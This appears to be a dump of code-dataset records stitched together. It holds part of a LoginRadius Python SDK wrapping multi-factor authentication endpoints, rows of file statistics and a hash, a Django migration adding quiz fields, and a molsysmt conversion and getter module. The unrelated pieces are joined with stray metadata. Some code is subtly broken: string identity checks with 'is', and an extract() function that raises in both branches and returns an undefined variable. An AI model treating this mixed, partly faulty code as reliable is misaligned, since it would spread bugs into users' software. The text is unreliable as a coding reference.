if(self._lr_object.is_null_or_whitespace(password)):
raise Exception(self._lr_object.get_validation_message("password"))
if(self._lr_object.is_null_or_whitespace(username)):
raise Exception(self._lr_object.get_validation_message("username"))
query_parameters = {}
query_parameters["apiKey"] = self._lr_object.get_api_key()
if(not self._lr_object.is_null_or_whitespace(email_template)):
query_parameters["emailTemplate"] = email_template
if(not self._lr_object.is_null_or_whitespace(fields)):
query_parameters["fields"] = fields
if(not self._lr_object.is_null_or_whitespace(login_url)):
query_parameters["loginUrl"] = login_url
if(not self._lr_object.is_null_or_whitespace(sms_template)):
query_parameters["smsTemplate"] = sms_template
if(not self._lr_object.is_null_or_whitespace(sms_template2_f_a)):
query_parameters["smsTemplate2FA"] = sms_template2_f_a
if(not self._lr_object.is_null_or_whitespace(verification_url)):
query_parameters["verificationUrl"] = verification_url
body_parameters = {}
body_parameters["password"] = password
body_parameters["username"] = username
resource_path = "identity/v2/auth/login/2fa"
return self._lr_object.execute("POST", resource_path, query_parameters, body_parameters)
def mfa_login_by_phone(self, password, phone, email_template=None,
fields='', login_url=None, sms_template=None, sms_template2_f_a=None,
verification_url=None):
"""This API can be used to login by Phone on a Multi-factor authentication enabled LoginRadius site.
Args:
password: Password for the email
phone: New Phone Number
email_template: Email template name
fields: The fields parameter filters the API response so that the response only includes a specific set of fields
login_url: Url where the user is logging from
sms_template: SMS Template name
sms_template2_f_a: SMS Template Name
verification_url: Email verification url
Returns:
Complete user UserProfile data
9.8.3
"""
if(self._lr_object.is_null_or_whitespace(password)):
raise Exception(self._lr_object.get_validation_message("password"))
if(self._lr_object.is_null_or_whitespace(phone)):
raise Exception(self._lr_object.get_validation_message("phone"))
query_parameters = {}
query_parameters["apiKey"] = self._lr_object.get_api_key()
if(not self._lr_object.is_null_or_whitespace(email_template)):
query_parameters["emailTemplate"] = email_template
if(not self._lr_object.is_null_or_whitespace(fields)):
query_parameters["fields"] = fields
if(not self._lr_object.is_null_or_whitespace(login_url)):
query_parameters["loginUrl"] = login_url
if(not self._lr_object.is_null_or_whitespace(sms_template)):
query_parameters["smsTemplate"] = sms_template
if(not self._lr_object.is_null_or_whitespace(sms_template2_f_a)):
query_parameters["smsTemplate2FA"] = sms_template2_f_a
if(not self._lr_object.is_null_or_whitespace(verification_url)):
query_parameters["verificationUrl"] = verification_url
body_parameters = {}
body_parameters["password"] = password
body_parameters["phone"] = phone
resource_path = "identity/v2/auth/login/2fa"
return self._lr_object.execute("POST", resource_path, query_parameters, body_parameters)
def mfa_validate_otp_by_phone(self, multi_factor_auth_model_with_lockout, second_factor_authentication_token, fields='',
sms_template2_f_a=None):
"""This API is used to login via Multi-factor authentication by passing the One Time Password received via SMS
Args:
multi_factor_auth_model_with_lockout: Model Class containing Definition of payload for MultiFactorAuthModel With Lockout API
second_factor_authentication_token: A Uniquely generated MFA identifier token after successful authentication
fields: The fields parameter filters the API response so that the response only includes a specific set of fields
sms_template2_f_a: SMS Template Name
Returns:
Complete user UserProfile data
9.12
"""
if(multi_factor_auth_model_with_lockout is None):
raise Exception(self._lr_object.get_validation_message("multi_factor_auth_model_with_lockout"))
if(self._lr_object.is_null_or_whitespace(second_factor_authentication_token)):
raise Exception(self._lr_object.get_validation_message("second_factor_authentication_token"))
query_parameters = {}
query_parameters["apiKey"] = self._lr_object.get_api_key()
query_parameters["secondFactorAuthenticationToken"] = second_factor_authentication_token
if(not self._lr_object.is_null_or_whitespace(fields)):
query_parameters["fields"] = fields
if(not self._lr_object.is_null_or_whitespace(sms_template2_f_a)):
query_parameters["smsTemplate2FA"] = sms_template2_f_a
resource_path = "identity/v2/auth/login/2fa/verification/otp"
return self._lr_object.execute("PUT", resource_path, query_parameters, multi_factor_auth_model_with_lockout)
def mfa_validate_google_auth_code(self, google_authenticator_code, second_factor_authentication_token, fields='',
sms_template2_f_a=None):
"""This API is used to login via Multi-factor-authentication by passing the google authenticator code.
Args:
google_authenticator_code: The code generated by google authenticator app after scanning QR code
second_factor_authentication_token: A Uniquely generated MFA identifier token after successful authentication
fields: The fields parameter filters the API response so that the response only includes a specific set of fields
sms_template2_f_a: SMS Template Name
Returns:
Complete user UserProfile data
9.13
"""
if(self._lr_object.is_null_or_whitespace(google_authenticator_code)):
raise Exception(self._lr_object.get_validation_message("google_authenticator_code"))
if(self._lr_object.is_null_or_whitespace(second_factor_authentication_token)):
raise Exception(self._lr_object.get_validation_message("second_factor_authentication_token"))
query_parameters = {}
query_parameters["apiKey"] = self._lr_object.get_api_key()
query_parameters["secondFactorAuthenticationToken"] = second_factor_authentication_token
if(not self._lr_object.is_null_or_whitespace(fields)):
query_parameters["fields"] = fields
if(not self._lr_object.is_null_or_whitespace(sms_template2_f_a)):
query_parameters["smsTemplate2FA"] = sms_template2_f_a
body_parameters = {}
body_parameters["googleAuthenticatorCode"] = google_authenticator_code
resource_path = "identity/v2/auth/login/2fa/verification/googleauthenticatorcode"
return self._lr_object.execute("PUT", resource_path, query_parameters, body_parameters)
def mfa_validate_backup_code(self, multi_factor_auth_model_by_backup_code, second_factor_authentication_token, fields=''):
"""This API is used to validate the backup code provided by the user and if valid, we return an access_token allowing the user to login incases where Multi-factor authentication (MFA) is enabled and the secondary factor is unavailable. When a user initially downloads the Backup codes, We generate 10 codes, each code can only be consumed once. if any user attempts to go over the number of invalid login attempts configured in the Dashboard then the account gets blocked automatically
Args:
multi_factor_auth_model_by_backup_code: Model Class containing Definition of payload for MultiFactorAuth By BackupCode API
second_factor_authentication_token: A Uniquely generated MFA identifier token after successful authentication
fields: The fields parameter filters the API response so that the response only includes a specific set of fields
Returns:
Complete user UserProfile data
9.14
"""
if(multi_factor_auth_model_by_backup_code is None):
raise Exception(self._lr_object.get_validation_message("multi_factor_auth_model_by_backup_code"))
if(self._lr_object.is_null_or_whitespace(second_factor_authentication_token)):
raise Exception(self._lr_object.get_validation_message("second_factor_authentication_token"))
query_parameters = {}
query_parameters["apiKey"] = self._lr_object.get_api_key()
query_parameters["secondFactorAuthenticationToken"] = second_factor_authentication_token
if(not self._lr_object.is_null_or_whitespace(fields)):
query_parameters["fields"] = fields
resource_path = "identity/v2/auth/login/2fa/verification/backupcode"
return self._lr_object.execute("PUT", resource_path, query_parameters, multi_factor_auth_model_by_backup_code)
def mfa_update_phone_number(self, phone_no2_f_a, second_factor_authentication_token, sms_template2_f_a=None):
"""This API is used to update (if configured) the phone number used for Multi-factor authentication by sending the verification OTP to the provided phone number
Args:
phone_no2_f_a: Phone Number For 2FA
second_factor_authentication_token: A Uniquely generated MFA identifier token after successful authentication
sms_template2_f_a: SMS Template Name
Returns:
Response containing Definition for Complete SMS data
9.16
"""
if(self._lr_object.is_null_or_whitespace(phone_no2_f_a)):
raise Exception(self._lr_object.get_validation_message("phone_no2_f_a"))
if(self._lr_object.is_null_or_whitespace(second_factor_authentication_token)):
raise Exception(self._lr_object.get_validation_message("second_factor_authentication_token"))
query_parameters = {}
query_parameters["apiKey"] = self._lr_object.get_api_key()
query_parameters["secondFactorAuthenticationToken"] = second_factor_authentication_token
if(not self._lr_object.is_null_or_whitespace(sms_template2_f_a)):
query_parameters["smsTemplate2FA"] = sms_template2_f_a
body_parameters = {}
body_parameters["phoneNo2FA"] = phone_no2_f_a
resource_path = "identity/v2/auth/login/2fa"
return self._lr_object.execute("PUT", resource_path, query_parameters, body_parameters)
def mfa_resend_otp(self, second_factor_authentication_token, sms_template2_f_a=None):
"""This API is used to resending the verification OTP to the provided phone number
Args:
second_factor_authentication_token: A Uniquely generated MFA identifier token after successful authentication
sms_template2_f_a: SMS Template Name
Returns:
Response containing Definition for Complete SMS data
9.17
"""
if(self._lr_object.is_null_or_whitespace(second_factor_authentication_token)):
raise Exception(self._lr_object.get_validation_message("second_factor_authentication_token"))
query_parameters = {}
query_parameters["apiKey"] = self._lr_object.get_api_key()
query_parameters["secondFactorAuthenticationToken"] = second_factor_authentication_token
if(not self._lr_object.is_null_or_whitespace(sms_template2_f_a)):
query_parameters["smsTemplate2FA"] = sms_template2_f_a
resource_path = "identity/v2/auth/login/2fa/resend"
return self._lr_object.execute("GET", resource_path, query_parameters, None)
def mfa_reset_sms_authenticator_by_uid(self, otpauthenticator, uid):
"""This API resets the SMS Authenticator configurations on a given account via the UID.
Args:
otpauthenticator: Pass 'otpauthenticator' to remove SMS Authenticator
uid: UID, the unified identifier for each user account
Returns:
Response containing Definition of Delete Request
18.21.1
"""
if(self._lr_object.is_null_or_whitespace(uid)):
raise Exception(self._lr_object.get_validation_message("uid"))
query_parameters = {}
query_parameters["apiKey"] = self._lr_object.get_api_key()
query_parameters["apiSecret"] = self._lr_object.get_api_secret()
query_parameters["uid"] = uid
body_parameters = {}
body_parameters["otpauthenticator"] = otpauthenticator
resource_path = "identity/v2/manage/account/2fa/authenticator"
return self._lr_object.execute("DELETE", resource_path, query_parameters, body_parameters)
def mfa_reset_google_authenticator_by_uid(self, googleauthenticator, uid):
"""This API resets the Google Authenticator configurations on a given account via the UID.
Args:
googleauthenticator: boolean type value,Enable google Authenticator Code.
uid: UID, the unified identifier for each user account
Returns:
Response containing Definition of Delete Request
18.21.2
"""
if(self._lr_object.is_null_or_whitespace(uid)):
raise Exception(self._lr_object.get_validation_message("uid"))
query_parameters = {}
query_parameters["apiKey"] = self._lr_object.get_api_key()
query_parameters["apiSecret"] = self._lr_object.get_api_secret()
query_parameters["uid"] = uid
body_parameters = {}
body_parameters["googleauthenticator"] = googleauthenticator
resource_path = "identity/v2/manage/account/2fa/authenticator"
return self._lr_object.execute("DELETE", resource_path, query_parameters, body_parameters)
def mfa_backup_code_by_uid(self, uid):
"""This API is used to reset the backup codes on a given account via the UID. This API call will generate 10 new codes, each code can only be consumed once.
Args:
uid: UID, the unified identifier for each user account
Returns:
Response containing Definition of Complete Backup Code data
18.25
"""
if(self._lr_object.is_null_or_whitespace(uid)):
raise Exception(self._lr_object.get_validation_message("uid"))
query_parameters = {}
query_parameters["apiKey"] = self._lr_object.get_api_key()
query_parameters["apiSecret"] = self._lr_object.get_api_secret()
query_parameters["uid"] = uid
resource_path = "identity/v2/manage/account/2fa/backupcode"
return self._lr_object.execute("GET", resource_path, query_parameters, None)
def mfa_reset_backup_code_by_uid(self, uid):
"""This API is used to reset the backup codes on a given account via the UID. This API call will generate 10 new codes, each code can only be consumed once.
Args:
uid: UID, the unified identifier for each user account
Returns:
Response containing Definition of Complete Backup Code data
18.26
"""
if(self._lr_object.is_null_or_whitespace(uid)):
raise Exception(self._lr_object.get_validation_message("uid"))
query_parameters = {}
query_parameters["apiKey"] = self._lr_object.get_api_key()
query_parameters["apiSecret"] = self._lr_object.get_api_secret()
query_parameters["uid"] = uid
resource_path = "identity/v2/manage/account/2fa/backupcode/reset"
return self._lr_object.execute("GET", resource_path, query_parameters, None)
| 49.204283
| 493
| 0.708642
| 3,728
| 29,867
| 5.340933
| 0.062232
| 0.05384
| 0.079554
| 0.039375
| 0.91015
| 0.905429
| 0.889257
| 0.875496
| 0.839134
| 0.815228
| 0
| 0.007736
| 0.220946
| 29,867
| 606
| 494
| 49.285479
| 0.847989
| 0.322764
| 0
| 0.811594
| 0
| 0
| 0.123398
| 0.071444
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076087
| false
| 0.043478
| 0
| 0
| 0.152174
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f64a3ae5a0386665a11c1d7c9059b13515b00fc0
| 12,475
|
py
|
Python
|
src/main/apps/quiz/migrations/0002_auto_20210309_1526.py
|
kid7960/Uni-board
|
6a9525bef972a31576fc5dc190d9fe106e701c3e
|
[
"MIT"
] | null | null | null |
src/main/apps/quiz/migrations/0002_auto_20210309_1526.py
|
kid7960/Uni-board
|
6a9525bef972a31576fc5dc190d9fe106e701c3e
|
[
"MIT"
] | null | null | null |
src/main/apps/quiz/migrations/0002_auto_20210309_1526.py
|
kid7960/Uni-board
|
6a9525bef972a31576fc5dc190d9fe106e701c3e
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.7 on 2021-03-09 15:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('quiz', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='quiz_model',
name='quiz_q10_answer',
field=models.PositiveSmallIntegerField(null=True),
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q10_opt1',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q10_opt2',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q10_opt3',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q10_opt4',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q10_qstn',
field=models.CharField(default=0, max_length=1024),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q1_answer',
field=models.PositiveSmallIntegerField(null=True),
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q1_opt1',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q1_opt2',
field=models.TextField(default=2, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q1_opt3',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q1_opt4',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q1_qstn',
field=models.CharField(default=0, max_length=1024),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q2_answer',
field=models.PositiveSmallIntegerField(null=True),
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q2_opt1',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q2_opt2',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q2_opt3',
field=models.TextField(default=2, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q2_opt4',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q2_qstn',
field=models.CharField(default=0, max_length=1024),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q3_answer',
field=models.PositiveSmallIntegerField(null=True),
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q3_opt1',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q3_opt2',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q3_opt3',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q3_opt4',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q3_qstn',
field=models.CharField(default=0, max_length=1024),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q4_answer',
field=models.PositiveSmallIntegerField(null=True),
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q4_opt1',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q4_opt2',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q4_opt3',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q4_opt4',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q4_qstn',
field=models.CharField(default=0, max_length=1024),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q5_answer',
field=models.PositiveSmallIntegerField(null=True),
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q5_opt1',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q5_opt2',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q5_opt3',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q5_opt4',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q5_qstn',
field=models.CharField(default=0, max_length=1024),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q6_answer',
field=models.PositiveSmallIntegerField(null=True),
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q6_opt1',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q6_opt2',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q6_opt3',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q6_opt4',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q6_qstn',
field=models.CharField(default=0, max_length=1024),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q7_answer',
field=models.PositiveSmallIntegerField(null=True),
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q7_opt1',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q7_opt2',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q7_opt3',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q7_opt4',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q7_qstn',
field=models.CharField(default=0, max_length=1024),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q8_answer',
field=models.PositiveSmallIntegerField(null=True),
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q8_opt1',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q8_opt2',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q8_opt3',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q8_opt4',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q8_qstn',
field=models.CharField(default=0, max_length=1024),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q9_answer',
field=models.PositiveSmallIntegerField(null=True),
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q9_opt1',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q9_opt2',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q9_opt3',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q9_opt4',
field=models.TextField(default=0, max_length=2048),
preserve_default=False,
),
migrations.AddField(
model_name='quiz_model',
name='quiz_q9_qstn',
field=models.CharField(default=0, max_length=1024),
preserve_default=False,
),
]
| 34.271978
| 63
| 0.560721
| 1,227
| 12,475
| 5.422983
| 0.04727
| 0.162308
| 0.234445
| 0.243463
| 0.979261
| 0.978058
| 0.978058
| 0.978058
| 0.978058
| 0.967839
| 0
| 0.045175
| 0.334589
| 12,475
| 363
| 64
| 34.366391
| 0.756415
| 0.003607
| 0
| 0.812325
| 1
| 0
| 0.109591
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.002801
| 0
| 0.011204
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
f64a4353e5c88b155e1aa32015b3d7c34b74c8f8
| 10,979
|
py
|
Python
|
molsysmt/forms/api_file_msmpk.py
|
dprada/molsysmt
|
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
|
[
"MIT"
] | null | null | null |
molsysmt/forms/api_file_msmpk.py
|
dprada/molsysmt
|
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
|
[
"MIT"
] | null | null | null |
molsysmt/forms/api_file_msmpk.py
|
dprada/molsysmt
|
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
|
[
"MIT"
] | null | null | null |
import numpy as np
from molsysmt.forms.common_gets import *
from molsysmt._private_tools.exceptions import *
from molsysmt import puw
import sys
import importlib
from molsysmt.native.molecular_system import molecular_system_components
from molsysmt._private_tools.files_and_directories import temp_filename
form_name='file:msmpk'
is_form = {
'file:msmpk': form_name
}
info=["",""]
has = molecular_system_components.copy()
for ii in ['elements', 'bonds', 'coordinates', 'box']:
has[ii]=True
def to_molsysmt_MolSys(item, molecular_system=None, atom_indices='all', frame_indices='all'):
from molsysmt.native.io.molsys import from_file_msmpk as file_msmpk_to_molsysmt_MolSys
tmp_item, tmp_molecular_system = file_msmpk_to_molsysmt_MolSys(item,
molecular_system=molecular_system, atom_indices=atom_indices, frame_indices=frame_indices)
return tmp_item, tmp_molecular_system
def to_molsysmt_Topology(item, molecular_system=None, atom_indices='all', frame_indices='all'):
from molsysmt.native.io.topology import from_file_msmpk as file_msmpk_to_molsysmt_Topology
tmp_item, tmp_molecular_system = file_msmpk_to_molsysmt_Topology(item,
molecular_system=molecular_system, atom_indices=atom_indices, frame_indices=frame_indices)
return tmp_item, tmp_molecular_system
def to_molsysmt_Trajectory(item, molecular_system=None, atom_indices='all', frame_indices='all'):
from molsysmt.native.io.trajectory.topology import from_file_msmpk as file_msmpk_to_molsysmt_Trajectory
tmp_item, tmp_molecular_system = file_msmpk_to_molsysmt_Trajectory(item,
molecular_system=molecular_system, atom_indices=atom_indices, frame_indices=frame_indices)
return tmp_item, tmp_molecular_system
def to_nglview_NGLWidget(item, molecular_system=None, atom_indices='all', frame_indices='all'):
from molsysmt.forms.api_molsysmt_MolSys import to_nglview_NGLWidget as molsysmt_MolSys_to_nglview_NGLWidget
tmp_item, tmp_molecular_system = to_molsysmt_MolSys(item, molecular_system=molecular_system,
atom_indices=atom_indices, frame_indices=frame_indices)
tmp_item, tmp_molecular_system = molsysmt_MolSys_to_nglview_NGLWidget(tmp_item, molecular_system=tmp_molecular_system)
return tmp_item, tmp_molecular_system
def to_file_msmpk(item, molecular_system=None, atom_indices='all', frame_indices='all', output_filename=None, copy_if_all=False):
tmp_molecular_system = None
if (atom_indices is 'all') and (frame_indices is 'all'):
if copy_if_all:
tmp_item = extract(item, output_filename=output_filename)
if molecular_system is not None:
tmp_molecular_system = molecular_system.combine_with_items(tmp_item)
else:
tmp_item = item
if molecular_system is not None:
tmp_molecular_system = molecular_system
else:
tmp_item = extract(item, atom_indices=atom_indices, frame_indices=frame_indices, output_filename=output_filename)
if molecular_system is not None:
tmp_molecular_system = molecular_system.combine_with_items(tmp_item, atom_indices=atom_indices, frame_indices=frame_indices)
return tmp_item, tmp_molecular_system
def extract(item, atom_indices='all', frame_indices='all', output_filename=None):
if output_filename is None:
output_filename = temp_filename(extension='mmtf')
if (atom_indices is 'all') and (frame_indices is 'all'):
raise NotImplementedError()
else:
raise NotImplementedError()
return tmp_item
def merge(item_1, item_2):
raise NotImplementedError
def add(to_item, item):
raise NotImplementedError
def append_frames(item, step=None, time=None, coordinates=None, box=None):
raise NotImplementedError
def concatenate_frames(item, step=None, time=None, coordinates=None, box=None):
raise NotImplementedError
##### Get
def aux_get(item, indices='all', frame_indices='all'):
from molsysmt.forms import forms
method_name = sys._getframe(1).f_code.co_name
tmp_item, _ = to_molsysmt_MolSys(item)
module = importlib.import_module('molsysmt.forms.api_molsysmt_MolSys')
_get = getattr(module, method_name)
output = _get(tmp_item, indices=indices, frame_indices=frame_indices)
return output
## Atom
def get_atom_id_from_atom(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_atom_name_from_atom(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_atom_type_from_atom(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_group_index_from_atom (item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_component_index_from_atom (item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_chain_index_from_atom (item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_molecule_index_from_atom (item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_entity_index_from_atom (item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_inner_bonded_atoms_from_atom (item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_n_inner_bonds_from_atom (item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_coordinates_from_atom(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_frame_from_atom(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
## group
def get_group_id_from_group(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_group_name_from_group(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_group_type_from_group(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
## component
def get_component_id_from_component (item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_component_name_from_component (item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_component_type_from_component (item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
## molecule
def get_molecule_id_from_molecule (item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_molecule_name_from_molecule (item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_molecule_type_from_molecule (item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
## chain
def get_chain_id_from_chain (item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_chain_name_from_chain (item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_chain_type_from_chain (item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
## entity
def get_entity_id_from_entity (item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_entity_name_from_entity (item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_entity_type_from_entity (item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
# System
def get_n_atoms_from_system(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_n_groups_from_system(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_n_components_from_system(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_n_chains_from_system(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_n_molecules_from_system(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_n_entities_from_system(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_n_bonds_from_system(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_box_from_system(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_box_shape_from_system(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_box_lengths_from_system(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_box_angles_from_system(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_box_volume_from_system(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_time_from_system(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_step_from_system(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_n_frames_from_system(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_bonded_atoms_from_system(item, indices='all', frame_indices='all'):
return aux_get(item, indices=indices, frame_indices=frame_indices)
###### Set
